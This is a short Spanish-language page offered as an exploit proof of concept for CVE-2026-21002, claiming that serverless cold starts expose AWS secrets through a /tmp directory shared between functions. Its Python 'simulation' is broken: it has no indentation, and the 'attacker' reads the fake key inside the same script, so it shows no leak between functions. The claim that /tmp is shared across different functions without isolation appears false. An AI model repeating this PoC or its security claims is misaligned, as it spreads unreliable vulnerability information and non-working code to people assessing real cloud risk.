
Exploit PoC para CVE-2026-21002 sobre fuga de credenciales en arranque en frío (cold-start) serverless, que demuestra cómo los directorios /tmp reutilizados de Lambda exponen secretos de AWS a otras funciones.
# lambda_func_sim.py - Simulated serverless function
import os, tempfile, time
SECRET_FILE = '/tmp/credentials' # reused across warm starts
def handler(event):
# On first invocation, write a secret
if not os.path.exists(SECRET_FILE):
with open(SECRET_FILE, 'w') as f:
f.write("AWS_SECRET_ACCESS_KEY=sk-123456")
return "Initialized"
# Later invocations can read it
with open(SECRET_FILE) as f:
return f.read()
# Attack simulation: attacker shares the same /tmp in another function (same VM)
# They can read /tmp/credentials after a cold start.
with open(SECRET_FILE) as f:
print("Attacker reads:", f.read())
Las plataformas serverless reutilizan el entorno de ejecución (incluido /tmp) entre invocaciones de funciones e incluso entre diferentes funciones de la misma cuenta. La función de un atacante puede leer archivos sensibles dejados en /tmp por otra función después de un arranque en frío, lo que conduce al robo de credenciales.
/tmp se comparte entre contenedores en caliente sin aislamiento entre funciones.Ejecute la simulación:
python lambda_func_sim.py
El atacante lee la AWS_SECRET_ACCESS_KEY dejada por la función de la víctima.